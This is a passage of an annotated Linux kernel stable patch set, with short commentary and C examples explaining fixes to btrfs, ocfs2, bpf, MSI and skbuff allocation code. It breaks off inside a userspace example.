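 * and the caller must NOT release it again (mirrors sock_release()
 * moving into the helper). */
static struct mapping *new_mapping(FILE *f)
{
	struct mapping *m = malloc(sizeof(*m));

	if (!m) {
		fclose(f);
		return NULL;
	}
	m->f = f;
	return m;
}

int main(void)
{
	FILE *f = tmpfile();
	struct mapping *m = f ? new_mapping(f) : NULL;

	if (!m)
		return 1;	/* no fclose(f) here: ownership was passed */
	fclose(m->f);
	free(m);
	return 0;
}
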
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index acae82a5f8ee6..21d8a895e9adb 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -5035,7 +5035,11 @@ static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root)
+ 		 */
+ 		inode = igrab(&btrfs_inode->vfs_inode);
+ 		if (inode) {
++			unsigned int nofs_flag;
++
++			nofs_flag = memalloc_nofs_save();
+ 			invalidate_inode_pages2(inode->i_mapping);
++			memalloc_nofs_restore(nofs_flag);
+ 			iput(inode);
+ 		}
+ 		spin_lock(&root->delalloc_lock);
+@@ -5140,7 +5144,12 @@ static void btrfs_cleanup_bg_io(struct btrfs_block_group *cache)
+ 
+ 	inode = cache->io_ctl.inode;
+ 	if (inode) {
++		unsigned int nofs_flag;
++
++		nofs_flag = memalloc_nofs_save();
+ 		invalidate_inode_pages2(inode->i_mapping);
++		memalloc_nofs_restore(nofs_flag);
++
+ 		BTRFS_I(inode)->generation = 0;
+ 		cache->io_ctl.inode = NULL;
+ 		iput(inode);
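
Both btrfs hunks above wrap invalidate_inode_pages2() in memalloc_nofs_save()/restore(): every allocation made inside the scope implicitly loses __GFP_FS, so direct reclaim cannot re-enter the filesystem while the cleanup path holds fs state. A kernel-style sketch of the scoped API; the function itself is illustrative:

#include <linux/sched/mm.h>
#include <linux/slab.h>

static void *alloc_in_fs_context(size_t size)
{
	unsigned int nofs_flag;
	void *p;

	/* Between save and restore, GFP_KERNEL allocations behave as
	 * GFP_NOFS, so reclaim will not recurse into the filesystem. */
	nofs_flag = memalloc_nofs_save();
	p = kmalloc(size, GFP_KERNEL);
	memalloc_nofs_restore(nofs_flag);

	return p;
}
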
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 89e810b27a4bf..e2e2ef0fa9a0f 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -904,6 +904,14 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 			ctx->sfu_remap = false; /* disable SFU mapping */
+ 		}
+ 		break;
++	case Opt_mapchars:
++		if (result.negated)
++			ctx->sfu_remap = false;
++		else {
++			ctx->sfu_remap = true;
++			ctx->remap = false; /* disable SFM (mapposix) mapping */
++		}
++		break;
+ 	case Opt_user_xattr:
+ 		if (result.negated)
+ 			ctx->no_xattr = 1;
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 05f32989bad6f..1c7ac433667df 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -242,6 +242,7 @@ static int ocfs2_mknod(struct user_namespace *mnt_userns,
+ 	int want_meta = 0;
+ 	int xattr_credits = 0;
+ 	struct ocfs2_security_xattr_info si = {
++		.name = NULL,
+ 		.enable = 1,
+ 	};
+ 	int did_quota_inode = 0;
+@@ -1805,6 +1806,7 @@ static int ocfs2_symlink(struct user_namespace *mnt_userns,
+ 	int want_clusters = 0;
+ 	int xattr_credits = 0;
+ 	struct ocfs2_security_xattr_info si = {
++		.name = NULL,
+ 		.enable = 1,
+ 	};
+ 	int did_quota = 0, did_quota_inode = 0;
+diff --git a/fs/ocfs2/xattr.c b/fs/ocfs2/xattr.c
+index 95d0611c5fc7d..55699c5735413 100644
+--- a/fs/ocfs2/xattr.c
++++ b/fs/ocfs2/xattr.c
+@@ -7259,9 +7259,21 @@ static int ocfs2_xattr_security_set(const struct xattr_handler *handler,
+ static int ocfs2_initxattrs(struct inode *inode, const struct xattr *xattr_array,
+ 		     void *fs_info)
+ {
++	struct ocfs2_security_xattr_info *si = fs_info;
+ 	const struct xattr *xattr;
+ 	int err = 0;
+ 
++	if (si) {
++		si->value = kmemdup(xattr_array->value, xattr_array->value_len,
++				    GFP_KERNEL);
++		if (!si->value)
++			return -ENOMEM;
++
++		si->name = xattr_array->name;
++		si->value_len = xattr_array->value_len;
++		return 0;
++	}
++
+ 	for (xattr = xattr_array; xattr->name != NULL; xattr++) {
+ 		err = ocfs2_xattr_set(inode, OCFS2_XATTR_INDEX_SECURITY,
+ 				      xattr->name, xattr->value,
+@@ -7277,13 +7289,23 @@ int ocfs2_init_security_get(struct inode *inode,
+ 			    const struct qstr *qstr,
+ 			    struct ocfs2_security_xattr_info *si)
+ {
++	int ret;
++
+ 	/* check whether ocfs2 support feature xattr */
+ 	if (!ocfs2_supports_xattr(OCFS2_SB(dir->i_sb)))
+ 		return -EOPNOTSUPP;
+-	if (si)
+-		return security_old_inode_init_security(inode, dir, qstr,
+-							&si->name, &si->value,
+-							&si->value_len);
++	if (si) {
++		ret = security_inode_init_security(inode, dir, qstr,
++						   &ocfs2_initxattrs, si);
++		/*
++		 * security_inode_init_security() does not return -EOPNOTSUPP,
++		 * so we have to check the xattr ourselves.
++		 */
++		if (!ret && !si->name)
++			si->enable = 0;
++
++		return ret;
++	}
+ 
+ 	return security_inode_init_security(inode, dir, qstr,
+ 					    &ocfs2_initxattrs, NULL);
+diff --git a/include/drm/drm_managed.h b/include/drm/drm_managed.h
+index 359883942612e..ad08f834af408 100644
+--- a/include/drm/drm_managed.h
++++ b/include/drm/drm_managed.h
+@@ -105,6 +105,22 @@ char *drmm_kstrdup(struct drm_device *dev, const char *s, gfp_t gfp);
+ 
+ void drmm_kfree(struct drm_device *dev, void *data);
+ 
+-int drmm_mutex_init(struct drm_device *dev, struct mutex *lock);
++void __drmm_mutex_release(struct drm_device *dev, void *res);
++
++/**
++ * drmm_mutex_init - &drm_device-managed mutex_init()
++ * @dev: DRM device
++ * @lock: lock to be initialized
++ *
++ * Returns:
++ * 0 on success, or a negative errno code otherwise.
++ *
++ * This is a &drm_device-managed version of mutex_init(). The initialized
++ * lock is automatically destroyed on the final drm_dev_put().
++ */
++#define drmm_mutex_init(dev, lock) ({					     \
++	mutex_init(lock);						     \
++	drmm_add_action_or_reset(dev, __drmm_mutex_release, lock);	     \
++})									     \
+ 
+ #endif
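
drmm_mutex_init() above turns from a function into a macro, presumably so that mutex_init() expands at each call site and every managed mutex gets its own lockdep class key rather than all sharing one. Typical use would look like this hypothetical sketch:

#include <drm/drm_managed.h>
#include <linux/mutex.h>

struct my_priv {
	struct drm_device *drm;	/* hypothetical driver private data */
	struct mutex lock;
};

static int my_priv_init(struct my_priv *p)
{
	/* Initialized here, destroyed automatically at the final
	 * drm_dev_put(); no matching mutex_destroy() in the driver. */
	return drmm_mutex_init(p->drm, &p->lock);
}
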
+diff --git a/include/linux/arm_ffa.h b/include/linux/arm_ffa.h
+index 5f02d2e6b9d9d..c617b179c26c2 100644
+--- a/include/linux/arm_ffa.h
++++ b/include/linux/arm_ffa.h
+@@ -13,6 +13,7 @@
+ 
+ /* FFA Bus/Device/Driver related */
+ struct ffa_device {
++	u32 id;
+ 	int vm_id;
+ 	bool mode_32bit;
+ 	uuid_t uuid;
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index f14ecbeab2a9d..a2b5592c68284 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1380,29 +1380,29 @@ extern int send_sigurg(struct fown_struct *fown);
+  * sb->s_flags.  Note that these mirror the equivalent MS_* flags where
+  * represented in both.
+  */
+-#define SB_RDONLY	 1	/* Mount read-only */
+-#define SB_NOSUID	 2	/* Ignore suid and sgid bits */
+-#define SB_NODEV	 4	/* Disallow access to device special files */
+-#define SB_NOEXEC	 8	/* Disallow program execution */
+-#define SB_SYNCHRONOUS	16	/* Writes are synced at once */
+-#define SB_MANDLOCK	64	/* Allow mandatory locks on an FS */
+-#define SB_DIRSYNC	128	/* Directory modifications are synchronous */
+-#define SB_NOATIME	1024	/* Do not update access times. */
+-#define SB_NODIRATIME	2048	/* Do not update directory access times */
+-#define SB_SILENT	32768
+-#define SB_POSIXACL	(1<<16)	/* VFS does not apply the umask */
+-#define SB_INLINECRYPT	(1<<17)	/* Use blk-crypto for encrypted files */
+-#define SB_KERNMOUNT	(1<<22) /* this is a kern_mount call */
+-#define SB_I_VERSION	(1<<23) /* Update inode I_version field */
+-#define SB_LAZYTIME	(1<<25) /* Update the on-disk [acm]times lazily */
++#define SB_RDONLY       BIT(0)	/* Mount read-only */
++#define SB_NOSUID       BIT(1)	/* Ignore suid and sgid bits */
++#define SB_NODEV        BIT(2)	/* Disallow access to device special files */
++#define SB_NOEXEC       BIT(3)	/* Disallow program execution */
++#define SB_SYNCHRONOUS  BIT(4)	/* Writes are synced at once */
++#define SB_MANDLOCK     BIT(6)	/* Allow mandatory locks on an FS */
++#define SB_DIRSYNC      BIT(7)	/* Directory modifications are synchronous */
++#define SB_NOATIME      BIT(10)	/* Do not update access times. */
++#define SB_NODIRATIME   BIT(11)	/* Do not update directory access times */
++#define SB_SILENT       BIT(15)
++#define SB_POSIXACL     BIT(16)	/* VFS does not apply the umask */
++#define SB_INLINECRYPT  BIT(17)	/* Use blk-crypto for encrypted files */
++#define SB_KERNMOUNT    BIT(22)	/* this is a kern_mount call */
++#define SB_I_VERSION    BIT(23)	/* Update inode I_version field */
++#define SB_LAZYTIME     BIT(25)	/* Update the on-disk [acm]times lazily */
+ 
+ /* These sb flags are internal to the kernel */
+-#define SB_SUBMOUNT     (1<<26)
+-#define SB_FORCE    	(1<<27)
+-#define SB_NOSEC	(1<<28)
+-#define SB_BORN		(1<<29)
+-#define SB_ACTIVE	(1<<30)
+-#define SB_NOUSER	(1<<31)
++#define SB_SUBMOUNT     BIT(26)
++#define SB_FORCE        BIT(27)
++#define SB_NOSEC        BIT(28)
++#define SB_BORN         BIT(29)
++#define SB_ACTIVE       BIT(30)
++#define SB_NOUSER       BIT(31)
+ 
+ /* These flags relate to encoding and casefolding */
+ #define SB_ENC_STRICT_MODE_FL	(1 << 0)
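
The conversion above is mechanical except for the top bit: (1<<31) overflows a signed int, while BIT(31) expands to an unsigned long shift. A self-contained userspace sketch of the idiom, with BIT() copied from its kernel definition and two flag names reused purely for illustration:

	#include <stdio.h>

	#define BIT(n) (1UL << (n))		/* as in include/vdso/bits.h */

	#define SB_RDONLY BIT(0)
	#define SB_NOUSER BIT(31)		/* (1 << 31) would be signed overflow */

	int main(void)
	{
		unsigned long s_flags = SB_RDONLY | SB_NOUSER;

		if (s_flags & SB_NOUSER)
			printf("flags = %#lx\n", s_flags);
		return 0;
	}
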
+diff --git a/include/linux/if_team.h b/include/linux/if_team.h
+index fc985e5c739d4..8de6b6e678295 100644
+--- a/include/linux/if_team.h
++++ b/include/linux/if_team.h
+@@ -208,6 +208,7 @@ struct team {
+ 	bool queue_override_enabled;
+ 	struct list_head *qom_lists; /* array of queue override mapping lists */
+ 	bool port_mtu_change_allowed;
++	bool notifier_ctx;
+ 	struct {
+ 		unsigned int count;
+ 		unsigned int interval; /* in ms */
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index 097cbf84c1e05..b2aee17a34d77 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -1639,7 +1639,9 @@ struct mlx5_ifc_cmd_hca_cap_bits {
+ 	u8         rc[0x1];
+ 
+ 	u8         uar_4k[0x1];
+-	u8         reserved_at_241[0x9];
++	u8         reserved_at_241[0x7];
++	u8         fl_rc_qp_when_roce_disabled[0x1];
++	u8         regexp_params[0x1];
+ 	u8         uar_sz[0x6];
+ 	u8         port_selection_cap[0x1];
+ 	u8         reserved_at_248[0x1];
+diff --git a/include/linux/msi.h b/include/linux/msi.h
+index fc918a658d480..e5dfb9cf3aa11 100644
+--- a/include/linux/msi.h
++++ b/include/linux/msi.h
+@@ -278,6 +278,13 @@ int arch_setup_msi_irq(struct pci_dev *dev, struct msi_desc *desc);
+ void arch_teardown_msi_irq(unsigned int irq);
+ int arch_setup_msi_irqs(struct pci_dev *dev, int nvec, int type);
+ void arch_teardown_msi_irqs(struct pci_dev *dev);
++#endif /* CONFIG_PCI_MSI_ARCH_FALLBACKS */
++
++/*
++ * Xen uses non-default msi_domain_ops and hence needs a way to populate sysfs
++ * entries of MSI IRQs.
++ */
++#if defined(CONFIG_PCI_XEN) || defined(CONFIG_PCI_MSI_ARCH_FALLBACKS)
+ #ifdef CONFIG_SYSFS
+ int msi_device_populate_sysfs(struct device *dev);
+ void msi_device_destroy_sysfs(struct device *dev);
+@@ -285,7 +292,7 @@ void msi_device_destroy_sysfs(struct device *dev);
+ static inline int msi_device_populate_sysfs(struct device *dev) { return 0; }
+ static inline void msi_device_destroy_sysfs(struct device *dev) { }
+ #endif /* !CONFIG_SYSFS */
+-#endif /* CONFIG_PCI_MSI_ARCH_FALLBACKS */
++#endif /* CONFIG_PCI_XEN || CONFIG_PCI_MSI_ARCH_FALLBACKS */
+ 
+ /*
+  * The restore hook is still available even for fully irq domain based
+diff --git a/include/linux/power/bq27xxx_battery.h b/include/linux/power/bq27xxx_battery.h
+index a1aa68141d0b5..7c8d65414a70a 100644
+--- a/include/linux/power/bq27xxx_battery.h
++++ b/include/linux/power/bq27xxx_battery.h
+@@ -2,6 +2,8 @@
+ #ifndef __LINUX_BQ27X00_BATTERY_H__
+ #define __LINUX_BQ27X00_BATTERY_H__
+ 
++#include <linux/power_supply.h>
++
+ enum bq27xxx_chip {
+ 	BQ27000 = 1, /* bq27000, bq27200 */
+ 	BQ27010, /* bq27010, bq27210 */
+@@ -68,7 +70,9 @@ struct bq27xxx_device_info {
+ 	struct bq27xxx_access_methods bus;
+ 	struct bq27xxx_reg_cache cache;
+ 	int charge_design_full;
++	bool removed;
+ 	unsigned long last_update;
++	union power_supply_propval last_status;
+ 	struct delayed_work work;
+ 	struct power_supply *bat;
+ 	struct list_head list;
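
The new include is needed because last_status is stored by value: a union power_supply_propval member requires the complete type, while the existing struct power_supply *bat pointer got by on a forward declaration alone. A small standalone illustration of the rule (type names below are stand-ins, not the real power-supply types):

	#include <stdio.h>

	struct propval { int intval; };		/* complete type: usable by value */
	struct power_supply;			/* forward declaration: pointers only */

	struct device_info {
		struct propval last_status;	/* by value: full definition required */
		struct power_supply *bat;	/* pointer: declaration suffices */
	};

	int main(void)
	{
		struct device_info di = { .last_status = { .intval = 1 } };

		printf("last_status.intval = %d\n", di.last_status.intval);
		return 0;
	}
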
+diff --git a/include/linux/tpm.h b/include/linux/tpm.h
+index dfeb25a0362de..4e22e4f4cec85 100644
+--- a/include/linux/tpm.h
++++ b/include/linux/tpm.h
+@@ -273,13 +273,15 @@ enum tpm2_cc_attrs {
+ #define TPM_VID_ATML     0x1114
+ 
+ enum tpm_chip_flags {
+-	TPM_CHIP_FLAG_TPM2		= BIT(1),
+-	TPM_CHIP_FLAG_IRQ		= BIT(2),
+-	TPM_CHIP_FLAG_VIRTUAL		= BIT(3),
+-	TPM_CHIP_FLAG_HAVE_TIMEOUTS	= BIT(4),
+-	TPM_CHIP_FLAG_ALWAYS_POWERED	= BIT(5),
++	TPM_CHIP_FLAG_BOOTSTRAPPED		= BIT(0),
++	TPM_CHIP_FLAG_TPM2			= BIT(1),
++	TPM_CHIP_FLAG_IRQ			= BIT(2),
++	TPM_CHIP_FLAG_VIRTUAL			= BIT(3),
++	TPM_CHIP_FLAG_HAVE_TIMEOUTS		= BIT(4),
++	TPM_CHIP_FLAG_ALWAYS_POWERED		= BIT(5),
+ 	TPM_CHIP_FLAG_FIRMWARE_POWER_MANAGED	= BIT(6),
+-	TPM_CHIP_FLAG_FIRMWARE_UPGRADE	= BIT(7),
++	TPM_CHIP_FLAG_FIRMWARE_UPGRADE		= BIT(7),
++	TPM_CHIP_FLAG_SUSPENDED			= BIT(8),
+ };
+ 
+ #define to_tpm_chip(d) container_of(d, struct tpm_chip, dev)
+diff --git a/include/linux/usb.h b/include/linux/usb.h
+index 6c95af3317f73..3ce7b052a19f5 100644
+--- a/include/linux/usb.h
++++ b/include/linux/usb.h
+@@ -279,6 +279,11 @@ void usb_put_intf(struct usb_interface *intf);
+ #define USB_MAXINTERFACES	32
+ #define USB_MAXIADS		(USB_MAXINTERFACES/2)
+ 
++bool usb_check_bulk_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs);
++bool usb_check_int_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs);
++
+ /*
+  * USB Resume Timer: Every Host controller driver should drive the resume
+  * signalling on the bus for the amount of time defined by this macro.
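
The two helpers exported above let drivers validate endpoint layout before trusting a device. Assuming the convention used by these checkers (an array of endpoint addresses terminated by 0), a probe function might reject a malformed device like this; the addresses 0x01/0x81 are hypothetical:

	/* in a driver's probe(), with intf the bound usb_interface */
	static const u8 wanted_eps[] = { 0x01, 0x81, 0 };	/* bulk-out, bulk-in, terminator */

	if (!usb_check_bulk_endpoints(intf, wanted_eps))
		return -ENODEV;		/* endpoint missing or not bulk: refuse to bind */
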
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 123729c0e1ee1..17329a19f0c64 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -223,6 +223,7 @@ struct bonding {
+ 	struct   bond_up_slave __rcu *usable_slaves;
+ 	struct   bond_up_slave __rcu *all_slaves;
+ 	bool     force_primary;
++	bool     notifier_ctx;
+ 	s32      slave_cnt; /* never change this value outside the attach/detach wrappers */
+ 	int     (*recv_probe)(const struct sk_buff *, struct bonding *,
+ 			      struct slave *);
+diff --git a/include/uapi/sound/skl-tplg-interface.h b/include/uapi/sound/skl-tplg-interface.h
+index f29899b179a62..4bf9c4f9add8a 100644
+--- a/include/uapi/sound/skl-tplg-interface.h
++++ b/include/uapi/sound/skl-tplg-interface.h
+@@ -66,7 +66,8 @@ enum skl_ch_cfg {
+ 	SKL_CH_CFG_DUAL_MONO = 9,
+ 	SKL_CH_CFG_I2S_DUAL_STEREO_0 = 10,
+ 	SKL_CH_CFG_I2S_DUAL_STEREO_1 = 11,
+-	SKL_CH_CFG_4_CHANNEL = 12,
++	SKL_CH_CFG_7_1 = 12,
++	SKL_CH_CFG_4_CHANNEL = SKL_CH_CFG_7_1,
+ 	SKL_CH_CFG_INVALID
+ };
+ 
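
Since this is a UAPI header, the enumerator cannot simply be renamed out from under existing users; the hunk keeps the old spelling as an alias with the same value. A tiny standalone demo of the pattern (names shortened for illustration):

	#include <stdio.h>

	enum ch_cfg {
		CH_CFG_7_1 = 12,
		CH_CFG_4_CHANNEL = CH_CFG_7_1,	/* legacy name, same value */
		CH_CFG_INVALID,			/* still 13: ordering unchanged */
	};

	int main(void)
	{
		printf("%d %d %d\n", CH_CFG_7_1, CH_CFG_4_CHANNEL, CH_CFG_INVALID);
		return 0;
	}
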
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 4a3d0a7447026..e4e7f343346f9 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1203,7 +1203,7 @@ static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+ 
+ 	ret = htab_lock_bucket(htab, b, hash, &flags);
+ 	if (ret)
+-		return ret;
++		goto err_lock_bucket;
+ 
+ 	l_old = lookup_elem_raw(head, hash, key, key_size);
+ 
+@@ -1224,6 +1224,7 @@ static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+ err:
+ 	htab_unlock_bucket(htab, b, hash, flags);
+ 
++err_lock_bucket:
+ 	if (ret)
+ 		htab_lru_push_free(htab, l_new);
+ 	else if (l_old)
+@@ -1326,7 +1327,7 @@ static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+ 
+ 	ret = htab_lock_bucket(htab, b, hash, &flags);
+ 	if (ret)
+-		return ret;
++		goto err_lock_bucket;
+ 
+ 	l_old = lookup_elem_raw(head, hash, key, key_size);
+ 
+@@ -1349,6 +1350,7 @@ static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+ 	ret = 0;
+ err:
+ 	htab_unlock_bucket(htab, b, hash, flags);
++err_lock_bucket:
+ 	if (l_new)
+ 		bpf_lru_push_free(&htab->lru, &l_new->lru_node);
+ 	return ret;
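
Both hunks fix the same bug: when htab_lock_bucket() fails, the early return leaked the element allocated before the lock attempt. The new label lands after the unlock but before the free, so only resources actually acquired are released. A standalone sketch of the ordering (error values and sizes made up):

	#include <stdio.h>
	#include <stdlib.h>

	static int update_elem(int fail_lock)
	{
		int ret = 0;
		void *l_new = malloc(16);	/* allocated before taking the lock */

		if (!l_new)
			return -1;

		if (fail_lock) {		/* the htab_lock_bucket() failure */
			ret = -16;		/* -EBUSY */
			goto err_lock_bucket;	/* skip the unlock, keep the free */
		}

		/* ... update under the lock, then unlock ... */

	err_lock_bucket:
		free(l_new);			/* the htab_lru_push_free() analogue */
		return ret;
	}

	int main(void)
	{
		printf("%d %d\n", update_elem(0), update_elem(1));
		return 0;
	}
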
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 322a2ae8f88b0..280e689517e10 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -13638,7 +13638,7 @@ static int convert_ctx_accesses(struct bpf_verifier_env *env)
+ 					insn_buf[cnt++] = BPF_ALU64_IMM(BPF_RSH,
+ 									insn->dst_reg,
+ 									shift);
+-				insn_buf[cnt++] = BPF_ALU64_IMM(BPF_AND, insn->dst_reg,
++				insn_buf[cnt++] = BPF_ALU32_IMM(BPF_AND, insn->dst_reg,
+ 								(1ULL << size * 8) - 1);
+ 			}
+ 		}
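
This one-opcode change matters because a BPF immediate is a signed 32-bit field: for a 4-byte narrow load of an 8-byte field, the mask (1ULL << 32) - 1 is stored as -1, and a 64-bit AND with the sign-extended immediate leaves the upper half of the register unmasked. A 32-bit ALU op zero-extends its result instead, which is exactly the truncation wanted. A standalone illustration of the two behaviours:

	#include <stdint.h>
	#include <stdio.h>

	int main(void)
	{
		uint64_t reg = 0xdeadbeef00112233ULL;
		int32_t imm = (uint32_t)((1ULL << 32) - 1);	/* truncates to -1 */

		uint64_t alu64 = reg & (uint64_t)(int64_t)imm;	/* sign-extended: no-op */
		uint64_t alu32 = (uint32_t)reg & (uint32_t)imm;	/* zero-extended result */

		printf("alu64=%#llx alu32=%#llx\n",
		       (unsigned long long)alu64, (unsigned long long)alu32);
		return 0;
	}
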
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index a9ee535293eb2..77e513e2e5da7 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -420,7 +420,7 @@ fail:
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_PCI_MSI_ARCH_FALLBACKS
++#if defined(CONFIG_PCI_MSI_ARCH_FALLBACKS) || defined(CONFIG_PCI_XEN)
+ /**
+  * msi_device_populate_sysfs - Populate msi_irqs sysfs entries for a device
+  * @dev:	The device (PCI, platform etc) which will get sysfs entries
+@@ -452,7 +452,7 @@ void msi_device_destroy_sysfs(struct device *dev)
+ 	msi_for_each_desc(desc, dev, MSI_DESC_ALL)
+ 		msi_sysfs_remove_desc(dev, desc);
+ }
+-#endif /* CONFIG_PCI_MSI_ARCH_FALLBACK */
++#endif /* CONFIG_PCI_MSI_ARCH_FALLBACK || CONFIG_PCI_XEN */
+ #else /* CONFIG_SYSFS */
+ static inline int msi_sysfs_create_group(struct device *dev) { return 0; }
+ static inline int msi_sysfs_populate_desc(struct device *dev, struct msi_desc *desc) { return 0; }
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index bdfd859cccaf2..c46736210363a 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -126,7 +126,7 @@ static const char *obj_states[ODEBUG_STATE_MAX] = {
+ 
+ static void fill_pool(void)
+ {
+-	gfp_t gfp = GFP_ATOMIC | __GFP_NORETRY | __GFP_NOWARN;
++	gfp_t gfp = __GFP_HIGH | __GFP_NOWARN;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 47660002cadaf..ef9772b12624c 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -506,14 +506,14 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 */
+ 	size = SKB_DATA_ALIGN(size);
+ 	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
++	osize = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(osize, gfp_mask, node, &pfmemalloc);
+ 	if (unlikely(!data))
+ 		goto nodata;
+-	/* kmalloc(size) might give us more room than requested.
++	/* kmalloc_size_roundup() might give us more room than requested.
+ 	 * Put skb_shared_info exactly at the end of allocated zone,
+ 	 * to allow max possible filling before reallocation.
+ 	 */
+-	osize = ksize(data);
+ 	size = SKB_WITH_OVERHEAD(osize);
+ 	prefetchw(data + size);
+ 
+@@ -1822,10 +1822,11 @@ EXPORT_SYMBOL(__pskb_copy_fclone);
+ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 		     gfp_t gfp_mask)
+ {
+-	int i, osize = skb_end_offset(skb);
+-	int size = osize + nhead + ntail;
++	unsigned int osize = skb_end_offset(skb);
++	unsigned int size = osize + nhead + ntail;
+ 	long off;
+ 	u8 *data;
++	int i;
+ 
+ 	BUG_ON(nhead < 0);
+ 
+@@ -1833,15 +1834,16 @@ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 
+ 	skb_zcopy_downgrade_managed(skb);
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		goto nodata;
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	/* Copy only real data... and, alas, header. This should be
+ 	 * optimized for the cases when header is void.
+@@ -4981,8 +4983,10 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
+ 
+-		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC)) {
++			kfree_skb(skb);
+ 			return;
++		}
+ 	}
+ 	if (!skb)
+ 		return;
+@@ -6182,21 +6186,20 @@ static int pskb_carve_inside_header(struct sk_buff *skb, const u32 off,
+ 				    const int headlen, gfp_t gfp_mask)
+ {
+ 	int i;
+-	int size = skb_end_offset(skb);
++	unsigned int size = skb_end_offset(skb);
+ 	int new_hlen = headlen - off;
+ 	u8 *data;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size +
+-			       SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+-
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	/* Copy real data, and all frags */
+ 	skb_copy_from_linear_data_offset(skb, off, data, new_hlen);
+@@ -6301,22 +6304,21 @@ static int pskb_carve_inside_nonlinear(struct sk_buff *skb, const u32 off,
+ 				       int pos, gfp_t gfp_mask)
+ {
+ 	int i, k = 0;
+-	int size = skb_end_offset(skb);
++	unsigned int size = skb_end_offset(skb);
+ 	u8 *data;
+ 	const int nfrags = skb_shinfo(skb)->nr_frags;
+ 	struct skb_shared_info *shinfo;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size +
+-			       SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+-
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	memcpy((struct skb_shared_info *)(data + size),
+ 	       skb_shinfo(skb), offsetof(struct skb_shared_info, frags[0]));
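
All four call sites above follow the same conversion: instead of allocating and then probing the allocator's slack with ksize(), the request is rounded up to the slab bucket size first via kmalloc_size_roundup(), so the nominal and usable sizes agree up front. A userspace analogue of the before/after, assuming glibc's malloc_usable_size() in the role of ksize() and a power-of-two round-up as a crude stand-in for kmalloc_size_roundup():

	#include <malloc.h>
	#include <stdio.h>
	#include <stdlib.h>

	int main(void)
	{
		size_t want = 1000;

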